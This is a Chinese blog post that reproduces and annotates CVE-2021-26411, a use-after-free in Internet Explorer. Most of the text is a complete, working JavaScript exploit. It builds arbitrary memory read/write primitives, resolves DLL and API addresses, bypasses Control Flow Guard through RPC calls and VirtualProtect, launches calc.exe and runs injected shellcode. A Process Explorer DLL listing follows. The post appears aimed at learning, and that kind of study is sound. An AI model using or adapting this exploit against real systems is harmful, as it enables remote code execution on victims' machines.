CVE-2021-26411复现,学习JavaScript之POC源码分析
概述
CVE-2021-26411,该漏洞的原因:removeAttributeNode()
触发属性对象nodeValue的valueOf回调,回调期间手动调用clearAttributes()
,导致nodeValue保存的BSTR被提前释放。回调返回后,没有检查nodeValue是否存在继续使用该对象,最终导致UAF(Use After Free)。
参考分析链接
国内链接
CVE-2021-26411在野样本中利用RPC绕过CFG缓解技术的研究 (qq.com)
IE浏览器在野0Day CVE-2021-26411漏洞分析 (qq.com)
原作者链接
https://enki.co.kr/blog/2021/02/04/ie_0day.html
平台环境
Win10 1809 17763 ==》 下载地址:https://hellowindows.cn/
商业-批量版 64位 2019-09-17 发布
文件:cn_windows_10_business_editions_version_1809_updated_sept_2019_x64_dvd_f873d037.iso 我是下载的这个版本复现
大小:5.07GB
SHA1:975f1b3acbeece56b5ad1526345a0657109f4043
VmWare 16.1.1 build-17801498
复现效果展示
POC源码
<!-- IE Double Free 1Day Poc --> <!doctype html> <html lang="zh-cmn-Hans"> <head> <meta http-equiv="Cache-Control" content="no-cache"> </head> <body> <script language="javascript"> // 重复字符串 String.prototype.repeat = function (size) { return new Array(size + 1).join(this) } function pad0(str) { // 提取倒数第四个字符开始的字符串,效果就是补0 return ('0000' + str).slice(-4) } // Access of Resource Using Incompatible Type ('Type Confusion') function alloc1() { // DataView 视图是一个可以从 二进制ArrayBuffer 对象中读写多种数值类型的底层接口,使用它时,不用考虑不同平台的字节序问题。 var view = new DataView(abf) var str = '' for (var i = 4; i < abf.byteLength - 2; i += 2) str += '%u' + pad0(view.getUint16(i, true).toString(16)) // 创建并返回一个新的属性节点 var result = document.createAttribute('alloc') // 对escape()编码的字符串进行解码 result.nodeValue = unescape(str) return result } function alloc2() { // 创建字典对象 var dic1 = new ActiveXObject('Scripting.Dictionary') var dic2 = new ActiveXObject('Scripting.Dictionary') // 增加新项,dic.add(key,value) dic2.add(0, 1) dic1.add(0, dic2.items()) dic1.add(1, fake) dic1.add(2, arr) for (i = 3; i < 0x20010 / 0x10; ++i) dic1.add(i, 0x12341234) return dic1.items() } function dump(nv) { // ArrayBuffer 对象用来表示通用的、固定长度的原始二进制数据缓冲区。 // 创建一个0x20010字节的缓冲区,并使用一个 DataView 来引用它 var ab = new ArrayBuffer(0x20010) var view = new DataView(ab) for (var i = 0; i < nv.length; ++i) view.setUint16(i * 2 + 4, nv.charCodeAt(i), true) return ab } // 在原型对象上定义属性 function Data(type, value) { this.type = type this.value = value } function setData(i, data) { var arr = new Uint32Array(abf) arr[i * 4] = data.type arr[i * 4 + 2] = data.value } function flush() { hd1.nodeValue = (new alloc1()).nodeValue hd2.nodeValue = 0 // 返回调用该方法的节点的一个副本. hd2 = hd1.cloneNode() } // 小端序读取 function read(addr, size) { switch (size) { case 8: return god.getUint8(addr) case 16: // getUint16(byteOffset [, littleEndian]) return god.getUint16(addr, true) case 32: return god.getUint32(addr, true) } } function write(addr, value, size) { switch (size) { case 8: return god.setUint8(addr, value) case 16: return god.setUint16(addr, value, true) case 32: return god.setUint32(addr, value, true) } } function writeData(addr, data) { for (var i = 0; i < data.length; ++i) write(addr + i, data[i], 8) } function addrOf(obj) { arr[0] = obj return read(pArr, 32) } function strcmp(str1, str2) { // typeof 操作符返回一个字符串,表示未经计算的操作数的类型。 str1 = (typeof str1 == 'string') ? str1 : toStr(str1) str2 = (typeof str2 == 'string') ? str2 : toStr(str2) return str1.toLowerCase() == str2.toLowerCase() } function memcpy(dst, src, size) { for (var i = 0; i < size; ++i) write(dst + i, read(src + i, 8), 8) } function toStr(addr) { var str = '' while (true) { var c = read(addr, 8) // 遇到终结符就退出循环 if (c == 0) break // 返回由指定的 UTF-16 代码单元序列创建的字符串 str += String.fromCharCode(c) addr++ } return str } function newStr(str) { var buffer = createArrayBuffer(str.length + 1) for (var i = 0; i < str.length; ++i) write(buffer + i, str.charCodeAt(i), 8) // 写入字符串终结符 write(buffer + i, 0, 8) return buffer } // PE文件相关操作函数 function getDllBase(base, name) { var tmpValue = 0 var index = 0 var iat = base + read(base + read(base + 60, 32) + 128, 32) while (true) { var offset = read(iat + index * 20 + 12, 32) if (strcmp(base + offset, name)) break index++ } var addr = read(iat + index * 20 + 16, 32) return getBase(read(base + addr, 32)) } function getBase(addr) { var addr = addr & 0xffff0000 while (true) { if (isMZ(addr) && isPE(addr)) break addr -= 0x10000 } return addr } function isMZ(addr) { return read(addr, 16) == 0x5a4d } function isPE(addr) { var sizeOfHeaders = read(addr + 60, 32) if (sizeOfHeaders > 0x600) return null var addr = addr + sizeOfHeaders if (read(addr, 32) != 0x4550) return null return addr } function winVer() { // 返回浏览器的平台和版本信息 var appVersion = window.navigator.appVersion var ver = 0 // 检测一个字符串是否匹配某个模式,javaScript正则表达式 if (/(Windows 10.0|Windows NT 10.0)/.test(appVersion)) { ver = 100 } else if (/(Windows 8.1|Windows NT 6.3)/.test(appVersion)) { ver = 81 } else if (/(Windows 8|Windows NT 6.2)/.test(appVersion)) { ver = 80 } else { ver = 70 } return ver } function createArrayBuffer(size) { var ab = new ArrayBuffer(size) var bs = read(addrOf(ab) + 0x1c, 32) // 设置键值对 map.set(bs, ab) return bs } function getProcAddr(addr, name) { var eat = addr + read(addr + read(addr + 0x3c, 32) + 0x78, 32) var non = read(eat + 0x18, 32) var aof = addr + read(eat + 0x1c, 32) var aon = addr + read(eat + 0x20, 32) var aono = addr + read(eat + 0x24, 32) for (var i = 0; i < non; ++i) { var offset = read(aon + i * 4, 32) if (strcmp(addr + offset, name)) break } var offset = read(aono + i * 2, 16) return addr + read(aof + offset * 4, 32) } function readyRpcCall(func) { var PRPC_CLIENT_INTERFACE_Buffer = _RPC_MESSAGE.get(msg, 'RpcInterfaceInformation') var _MIDL_SERVER_INFO_Buffer = PRPC_CLIENT_INTERFACE.get(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo') var RPC_DISPATCH_TABLE_Buffer = _MIDL_SERVER_INFO_.get(_MIDL_SERVER_INFO_Buffer, 'DispatchTable') write(RPC_DISPATCH_TABLE_Buffer, func, 32) } function setArgs(args) { var buffer = createArrayBuffer(48) for (var i = 0; i < args.length; ++i) { write(buffer + i * 4, args[i], 32) } _RPC_MESSAGE.set(msg, 'Buffer', buffer) _RPC_MESSAGE.set(msg, 'BufferLength', 48) _RPC_MESSAGE.set(msg, 'RpcFlags', 0x1000) return buffer } function callRpcFreeBufferImpl() { var buffer = _RPC_MESSAGE.get(msg, 'Buffer') _RPC_MESSAGE.set(rpcFree, 'Buffer', buffer) return call(rpcFree) } function callRpcFreeBuffer() { var buffer = _RPC_MESSAGE.get(msg, 'Buffer') var result = read(buffer, 32) callRpcFreeBufferImpl() return result } function call2(func, args) { readyRpcCall(func) var buffer = setArgs(args) call(msg) map.delete(buffer) return callRpcFreeBuffer() } function call(addr) { var result = 0 write(paoi + 0x18, addr, 32) // 错误处理 try { // rpcrt4!NdrServerCall2 xyz.normalize() } catch (error) { result = error.number } write(paoi + 0x18, patt, 32) return result } function prepareCall(addr, func) { var buf = createArrayBuffer(cattr.size()) var vft = read(patt, 32) memcpy(addr, patt, cbase.size()) memcpy(buf, vft, cattr.size()) cbase.set(addr, 'pvftable', buf) cattr.set(buf, 'normalize', func) } function createBase() { var isWin7 = winVer() == 70 var size = isWin7 ? 560 : 572 var offset = isWin7 ? 540 : 548 var addr1 = createArrayBuffer(size + cbase.size()) var addr2 = createArrayBuffer(48) write(addr1 + offset, addr2, 32) write(addr2 + 40, 8, 32) write(addr2 + 36, 8, 32) return { size: size, addr: addr1 } } function aos() { var baseObj = createBase() var addr = baseObj.addr + baseObj.size var I_RpcTransServerNewConnection = getProcAddr(rpcrt4, 'I_RpcTransServerNewConnection') prepareCall(addr, I_RpcTransServerNewConnection) return read(read(call(addr)-0xf8, 32), 32) } // 自定义结构体的操作 function SymTab(size, sym) { this.size = function() { return size } this.set = function(addr, name, value) { var o = sym[name] write(addr + o.offset, value, o.size) } this.get = function(addr, name) { var o = sym[name] return read(addr + o.offset, o.size) } } // 构造RPC function initRpc() { var data = [50,72,0,0,0,0,0,0,52,0,192,0,16,0,68,13,10,1,0,0,0,0,0,0,0,0,72,0,0,0,9,0,72,0,4,0,9,0,72,0,8,0,9,0,72,0,12,0,9,0,72,0,16,0,9,0,72,0,20,0,9,0,72,0,24,0,9,0,72,0,28,0,9,0,72,0,32,0,9,0,72,0,36,0,9,0,72,0,40,0,9,0,72,0,44,0,9,0,112,0,48,0,9,0,0] var NdrServerCall2 = getProcAddr(rpcrt4, 'NdrServerCall2') var NdrOleAllocate = getProcAddr(rpcrt4, 'NdrOleAllocate') var NdrOleFree = getProcAddr(rpcrt4, 'NdrOleFree') var RPCMessageObject = createArrayBuffer(cbase.size()) var buffer = createArrayBuffer(0x100) var buffer2 = createArrayBuffer(0x200) var AttributeVtable = read(patt, 32) var MSHTMLSymbolBuffer = createArrayBuffer(0x1000) var TransferSyntaxBuffer = createArrayBuffer(syntaxObject.size()) var PRPC_CLIENT_INTERFACE_Buffer = createArrayBuffer(PRPC_CLIENT_INTERFACE.size()) var _MIDL_SERVER_INFO_Buffer = createArrayBuffer(_MIDL_SERVER_INFO_.size()) var rpcProcStringBuffer = createArrayBuffer(data.length) writeData(rpcProcStringBuffer, data) var _MIDL_STUB_DESC_Buffer = createArrayBuffer(_MIDL_STUB_DESC.size()) var RPC_DISPATCH_TABLE_Buffer = createArrayBuffer(RPC_DISPATCH_TABLE.size()) var NdrServerCall2Buffer = createArrayBuffer(4) write(NdrServerCall2Buffer, NdrServerCall2, 32) write(MSHTMLSymbolBuffer, osf_vft, 32) write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32) write(MSHTMLSymbolBuffer + 8, 0x40, 32) cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard')) cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId')) cattr.set(MSHTMLSymbolBuffer, 'normalize', NdrServerCall2) cbase.set(RPCMessageObject, 'pSecurityContext', RPCMessageObject + 68) write(RPCMessageObject + 76, 1, 32) syntaxObject.set(TransferSyntaxBuffer, 'SyntaxVersion.MajorVersion', 2) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnAllocate', NdrOleAllocate) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnFree', NdrOleFree) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pFormatTypes', buffer2) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'fCheckBounds', 1) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'Version', 0x50002) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'MIDLVersion', 0x800025b) _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'mFlags', 1) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'pStubDesc', _MIDL_STUB_DESC_Buffer) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'DispatchTable', createArrayBuffer(32)) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'ProcString', rpcProcStringBuffer) _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'FmtStringOffset', buffer2) RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTableCount', 1) RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTable', NdrServerCall2Buffer) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'DispatchTable', RPC_DISPATCH_TABLE_Buffer) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo', _MIDL_SERVER_INFO_Buffer) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Length', PRPC_CLIENT_INTERFACE.size()) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterfaceId.SyntaxVersion.MajorVersion', 1) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'TransferSyntax.SyntaxVersion.MajorVersion', 2) PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Flags', 0x4000000) _RPC_MESSAGE.set(RPCMessageObject, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer) _RPC_MESSAGE.set(RPCMessageObject, 'TransferSyntax', TransferSyntaxBuffer) _RPC_MESSAGE.set(RPCMessageObject, 'Handle', MSHTMLSymbolBuffer) _RPC_MESSAGE.set(RPCMessageObject, 'DataRepresentation', 16) _RPC_MESSAGE.set(RPCMessageObject, 'RpcFlags', 0x1000) _RPC_MESSAGE.set(RPCMessageObject, 'Buffer', buffer) _RPC_MESSAGE.set(RPCMessageObject, 'BufferLength', 48) return RPCMessageObject } function rpcFree() { var Cbase = createArrayBuffer(cbase.size()) var I_RpcFreeBuffer = getProcAddr(rpcrt4, 'I_RpcFreeBuffer') var MSHTMLSymbolBuffer = createArrayBuffer(0x1000) var AttributeVtable = read(patt, 32) write(MSHTMLSymbolBuffer, osf_vft, 32) write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32) write(MSHTMLSymbolBuffer + 8, 64, 32) cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard')) cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf')) cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId')) cattr.set(MSHTMLSymbolBuffer, 'normalize', I_RpcFreeBuffer) cbase.set(Cbase, 'pvftable', MSHTMLSymbolBuffer) cbase.set(Cbase, 'pSecurityContext', Cbase + 68) write(Cbase + 76, 1, 32) return Cbase } function CFGObject(baseAddress) { var PEAddr = isPE(baseAddress) var eat = PEAddr + 120 var LOAD_CONFIG_DIRECTORY = baseAddress + read(eat + 0x50, 32) var size = read(LOAD_CONFIG_DIRECTORY, 32) var sizeOfImage = read(PEAddr + 0x50, 32) var CFGSymbolTable = new SymTab(0x5c, { '___guard_check_icall_fptr': { offset: 72, size: 32 } }) var guard_check_icall_fptr_address = size < CFGSymbolTable.size() ? 0 : CFGSymbolTable.get(LOAD_CONFIG_DIRECTORY, '___guard_check_icall_fptr') this.getCFGAddress = function() { return guard_check_icall_fptr_address } this.getCFGValue = function() { if (size < CFGSymbolTable.size()) return false var currentCFGValue = read(guard_check_icall_fptr_address, 32) var isValidAddress = (baseAddress < currentCFGValue) && (currentCFGValue < baseAddress + sizeOfImage) return !isValidAddress; } } function killCfg(addr) { var cfgobj = new CFGObject(addr) if (!cfgobj.getCFGValue()) return var guard_check_icall_fptr_address = cfgobj.getCFGAddress() var KiFastSystemCallRet = getProcAddr(ntdll, 'KiFastSystemCallRet') var tmpBuffer = createArrayBuffer(4) // 修改RPCRT4!__guard_check_icall_fptr的属性为PAGE_EXECUTE_READWRITE call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer]) // 替换rpcrt4!__guard_check_icall_fptr保存的指针,修改ntdll!LdrpValidateUserCallTarget为改为ntdll!KiFastSystemCallRet // 关闭rpcrt4的CFG检查 write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32) // 恢复PRCRT4!__gurad_check_icall_fptr内存属性 call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer]) map.delete(tmpBuffer) } // {} 表示对象 // 属性:属性值 var cbase = new SymTab(0x60, { 'pvftable': { offset: 0x0, size: 32 }, 'pSecurityContext': { offset: 0x44, size: 32 } }) var cattr = new SymTab(0x32c, { '__vtguard': { offset: 0x48, size: 32 }, 'SecurityContext': { offset: 0xc8, size: 32 }, 'JSBind_TypeId': { offset: 0x160, size: 32 }, 'JSBind_InstanceOf': { offset: 0x164, size: 32 }, 'normalize': { offset: 0x28c, size: 32 } }) var syntaxObject = new SymTab(0x14, { 'SyntaxVersion.MajorVersion': { offset: 0x10, size: 16 } }) var PRPC_CLIENT_INTERFACE = new SymTab(0x44, { 'Length': { offset: 0, size: 32 }, 'InterfaceId.SyntaxVersion.MajorVersion': { offset: 20, size: 16 }, 'TransferSyntax.SyntaxVersion.MajorVersion': { offset: 40, size: 16 }, // 保存了runtime库和Stub函数的接口指针 'DispatchTable': { offset: 44, size: 32 }, // 指向MIDL_SERVER_INFO结构 'InterpreterInfo': { offset: 60, size: 32 }, 'Flags': { offset: 64, size: 32 } }) // 保存了服务端IDL接口信息 var _MIDL_SERVER_INFO_ = new SymTab(0x20, { 'pStubDesc': { offset: 0, size: 32 }, // 保存了服务端提供的远程调用例程的函数指针数组 'DispatchTable': { offset: 4, size: 32 }, 'ProcString': { offset: 8, size: 32 }, 'FmtStringOffset': { offset: 12, size: 32 } }) var _MIDL_STUB_DESC = new SymTab(0x50, { 'RpcInterfaceInformation': { offset: 0, size: 32 }, 'pfnAllocate': { offset: 4, size: 32 }, 'pfnFree': { offset: 8, size: 32 }, 'pFormatTypes': { offset: 32, size: 32 }, 'fCheckBounds': { offset: 36, size: 32 }, 'Version': { offset: 40, size: 32 }, 'MIDLVersion': { offset: 48, size: 32 }, 'mFlags': { offset: 64, size: 32 } }) var RPC_DISPATCH_TABLE = new SymTab(12, { 'DispatchTableCount': { offset: 0, size: 32 }, 'DispatchTable': { offset: 4, size: 32 }, }) var _RPC_MESSAGE = new SymTab(0x2c, { 'Handle': { offset: 0, size: 32 }, 'DataRepresentation': { offset: 4, size: 32 }, // 存放函数的参数 'Buffer': { offset: 8, size: 32 }, 'BufferLength': { offset: 12, size: 32 }, 'TransferSyntax': { offset: 20, size: 32 }, // 指向RPC_SERVER_INTERFACE 'RpcInterfaceInformation': { offset: 24, size: 32 }, 'RpcFlags': { offset: 40, size: 32 } }) var god // 对象数组 var arr = [{}] var fake = new ArrayBuffer(0x100) var abf = new ArrayBuffer(0x20010) var alloc = alloc2() // 创建一个HTML 属性对象 var hd0 = document.createAttribute('handle') var hd1 = document.createAttribute('handle') var hd2 // 创建一个HTML 元素对象 var ele = document.createElement('element') var att = document.createAttribute('attribute') att.nodeValue = { valueOf: function() { hd1.nodeValue = (new alloc1()).nodeValue // 回调时,清除ele对象绑定的所有属性 ele.clearAttributes() hd2 = hd1.cloneNode() ele.setAttribute('attribute', 1337) } } ele.setAttributeNode(att) ele.setAttribute('attr', '0'.repeat((0x20010 - 6) / 2)) // 触发valueof函数回调 ele.removeAttributeNode(att) hd0.nodeValue = alloc var leak = new Uint32Array(dump(hd2.nodeValue)) var pAbf = leak[6] var pArr = leak[10] var VT_I4 = 0x3 var VT_DISPATCH = 0x9 var VT_BYREF = 0x4000 var bufArr = new Array(0x10) var fakeArr = new Uint32Array(fake) for (var i = 0; i < 0x10; ++i) setData(i + 1, new Data(VT_BYREF | VT_I4, pAbf + i * 4)) flush() var ref = new VBArray(hd0.nodeValue) for (var i = 0; i < 0x10; ++i) bufArr[i] = ref.getItem(i + 1) ref = null setData(1, new Data(VT_BYREF | VT_I4, bufArr[4])) setData(2, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x04)) setData(3, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x1c)) flush() ref = new VBArray(hd0.nodeValue) var vt = ref.getItem(1) var gc = ref.getItem(2) var bs = ref.getItem(3) ref = null for (var i = 0; i < 16; ++i) fakeArr[i] = bufArr[i] fakeArr[4] = bs + 0x40 fakeArr[16] = vt fakeArr[17] = gc fakeArr[24] = 0xffffffff setData(1, new Data(VT_DISPATCH, bs)) flush() ref = new VBArray(hd0.nodeValue) god = new DataView(ref.getItem(1)) ref = null pArr = read(read(pArr + 0x10, 32) + 0x14, 32) + 0x10 write(read(addrOf(hd0) + 0x18, 32) + 0x28, 0, 32) var map = new Map() var jscript9 = getBase(read(addrOf(map), 32)) var rpcrt4 = getDllBase(jscript9, 'rpcrt4.dll') var msvcrt = getDllBase(jscript9, 'msvcrt.dll') var ntdll = getDllBase(msvcrt, 'ntdll.dll') var kernelbase = getDllBase(msvcrt, 'kernelbase.dll') var VirtualProtect = getProcAddr(kernelbase, 'VirtualProtect') var LoadLibraryExA = getProcAddr(kernelbase, 'LoadLibraryExA') var xyz = document.createAttribute('xyz') var paoi = addrOf(xyz) var patt = read(addrOf(xyz) + 0x18, 32) var osf_vft = aos() var msg = initRpc() var rpcFree = rpcFree() killCfg(rpcrt4) // 调用API,弹出计算器 var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)]) var WinExec = getProcAddr(kernel32,'WinExec') call2(WinExec,[newStr('calc.exe'),5]) // 调用shellcode var shellcode = new Uint8Array([0xb8, 0x37, 0x13, 0x00, 0x00, 0xc3]) var msi = call2(LoadLibraryExA, [newStr('msi.dll'), 0, 1]) + 0x5000 var tmpBuffer = createArrayBuffer(4) call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer]) writeData(msi, shellcode) // mov eax, 0x1337 ; ret call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer]) var result = call2(msi, []) // 根据shellocde的而反汇编结果,这里会弹出0x1337的对话框 alert(result.toString(16)) </script> </body> </html>
注意细节:我是本地保存html,然后打开复现的,
C:\Users\bonelee\Desktop\1809.html
如果是放在服务器下运行然后访问,则不会弹出计算器。但是会有弹窗,如下:
我们使用proc exp采集下数据:
可以看到ie并没有calc的自进程!从其加载的dll里,可以看到有mshtml.dll!
可以看到是svchost出来的。
我们重点看下ie加载的dll清单:
Process: iexplore.exe Pid: 2280 Name Description Company Name Path {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db {AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db C:\Users\bonelee\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db advapi32.dll Advanced Windows 32 Base API Microsoft Corporation C:\Windows\SysWOW64\advapi32.dll apphelp.dll 应用程序兼容性客户端库 Microsoft Corporation C:\Windows\SysWOW64\apphelp.dll bcrypt.dll Windows Cryptographic Primitives Library (Wow64) Microsoft Corporation C:\Windows\SysWOW64\bcrypt.dll bcryptprimitives.dll Windows Cryptographic Primitives Library Microsoft Corporation C:\Windows\SysWOW64\bcryptprimitives.dll C_1252.NLS C:\Windows\System32\C_1252.NLS cfgmgr32.dll Configuration Manager DLL Microsoft Corporation C:\Windows\SysWOW64\cfgmgr32.dll clbcatq.dll COM+ Configuration Catalog Microsoft Corporation C:\Windows\SysWOW64\clbcatq.dll combase.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\combase.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll comctl32.dll 用户体验控件库 Microsoft Corporation C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll comdlg32.dll Common Dialogs DLL Microsoft Corporation C:\Windows\SysWOW64\comdlg32.dll coml2.dll Microsoft COM for Windows Microsoft Corporation C:\Windows\SysWOW64\coml2.dll CoreMessaging.dll Microsoft CoreMessaging Dll Microsoft Corporation C:\Windows\SysWOW64\CoreMessaging.dll CoreUIComponents.dll Microsoft Core UI Components Dll Microsoft Corporation C:\Windows\SysWOW64\CoreUIComponents.dll crypt32.dll Crypto API32 Microsoft Corporation C:\Windows\SysWOW64\crypt32.dll cryptbase.dll Base cryptographic API DLL Microsoft Corporation C:\Windows\SysWOW64\cryptbase.dll cryptsp.dll Cryptographic Service Provider API Microsoft Corporation C:\Windows\SysWOW64\cryptsp.dll cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db cversions.2.db C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db d2d1.dll Microsoft D2D Library Microsoft Corporation C:\Windows\SysWOW64\d2d1.dll d3d11.dll Direct3D 11 Runtime Microsoft Corporation C:\Windows\SysWOW64\d3d11.dll DataExchange.dll Data exchange Microsoft Corporation C:\Windows\SysWOW64\DataExchange.dll dcomp.dll Microsoft DirectComposition Library Microsoft Corporation C:\Windows\SysWOW64\dcomp.dll directmanipulation.dll Microsoft Direct Manipulation Component Microsoft Corporation C:\Windows\SysWOW64\directmanipulation.dll dwmapi.dll Microsoft Desktop Window Manager API Microsoft Corporation C:\Windows\SysWOW64\dwmapi.dll DWrite.dll Microsoft DirectX Typography Services Microsoft Corporation C:\Windows\SysWOW64\DWrite.dll dxgi.dll DirectX Graphics Infrastructure Microsoft Corporation C:\Windows\SysWOW64\dxgi.dll efswrt.dll Storage Protection Windows Runtime DLL Microsoft Corporation C:\Windows\SysWOW64\efswrt.dll gdi32.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32.dll gdi32full.dll GDI Client DLL Microsoft Corporation C:\Windows\SysWOW64\gdi32full.dll ieapfltr.dll Microsoft SmartScreen Filter Microsoft Corporation C:\Windows\SysWOW64\ieapfltr.dll ieframe.dll Internet 浏览器 Microsoft Corporation C:\Windows\SysWOW64\ieframe.dll ieframe.dll.mui Internet 浏览器 Microsoft Corporation C:\Windows\System32\zh-CN\ieframe.dll.mui ieproxy.dll IE ActiveX Interface Marshaling Library Microsoft Corporation C:\Windows\SysWOW64\ieproxy.dll iertutil.dll Internet Explorer 的运行时实用程序 Microsoft Corporation C:\Windows\SysWOW64\iertutil.dll IEShims.dll Internet Explorer Compatibility Shims Microsoft Corporation C:\Program Files (x86)\Internet Explorer\IEShims.dll ieui.dll Internet Explorer UI 引擎 Microsoft Corporation C:\Windows\SysWOW64\ieui.dll iexplore.exe Internet Explorer Microsoft Corporation C:\Program Files (x86)\Internet Explorer\iexplore.exe iexplore.exe.mui Internet Explorer Microsoft Corporation C:\Program Files\internet explorer\zh-CN\iexplore.exe.mui imageres.dll Windows Image Resource Microsoft Corporation C:\Windows\SysWOW64\imageres.dll imageres.dll.mui Windows Image Resource Microsoft Corporation C:\Windows\System32\en-US\imageres.dll.mui imm32.dll Multi-User Windows IMM32 API Client DLL Microsoft Corporation C:\Windows\SysWOW64\imm32.dll IPHLPAPI.DLL IP Helper API Microsoft Corporation C:\Windows\SysWOW64\IPHLPAPI.DLL jscript9.dll Microsoft (R) JScript Microsoft Corporation C:\Windows\SysWOW64\jscript9.dll kernel.appcore.dll AppModel API Host Microsoft Corporation C:\Windows\SysWOW64\kernel.appcore.dll kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\kernel32.dll KernelBase.dll Windows NT BASE API Client DLL Microsoft Corporation C:\Windows\SysWOW64\KernelBase.dll KernelBase.dll.mui Windows NT 基本 API 客户端 DLL Microsoft Corporation C:\Windows\System32\zh-CN\KernelBase.dll.mui locale.nls C:\Windows\System32\locale.nls mlang.dll Multi Language Support DLL Microsoft Corporation C:\Windows\SysWOW64\mlang.dll mlang.dll.mui 多语言支持 DLL Microsoft Corporation C:\Windows\System32\zh-CN\mlang.dll.mui mpr.dll Multiple Provider Router DLL Microsoft Corporation C:\Windows\SysWOW64\mpr.dll msasn1.dll ASN.1 Runtime APIs Microsoft Corporation C:\Windows\SysWOW64\msasn1.dll msctf.dll MSCTF Server DLL Microsoft Corporation C:\Windows\SysWOW64\msctf.dll mshtml.dll Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\SysWOW64\mshtml.dll mshtml.dll.mui Microsoft (R) HTML 查看器 Microsoft Corporation C:\Windows\System32\zh-CN\mshtml.dll.mui msi.dll Windows Installer Microsoft Corporation C:\Windows\SysWOW64\msi.dll msimtf.dll Active IMM Server DLL Microsoft Corporation C:\Windows\SysWOW64\msimtf.dll msIso.dll Isolation Library for Internet Explorer Microsoft Corporation C:\Windows\SysWOW64\msIso.dll msvcp_win.dll Microsoft® C Runtime Library Microsoft Corporation C:\Windows\SysWOW64\msvcp_win.dll msvcrt.dll Windows NT CRT DLL Microsoft Corporation C:\Windows\SysWOW64\msvcrt.dll mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation C:\Windows\SysWOW64\mswsock.dll netapi32.dll Net Win32 API DLL Microsoft Corporation C:\Windows\SysWOW64\netapi32.dll netmsg.dll 网络消息 DLL Microsoft Corporation C:\Windows\SysWOW64\netmsg.dll netmsg.dll.mui 网络消息 DLL Microsoft Corporation C:\Windows\System32\zh-CN\netmsg.dll.mui netutils.dll Net Win32 API Helpers DLL Microsoft Corporation C:\Windows\SysWOW64\netutils.dll ninput.dll Microsoft Pen and Touch Input Component Microsoft Corporation 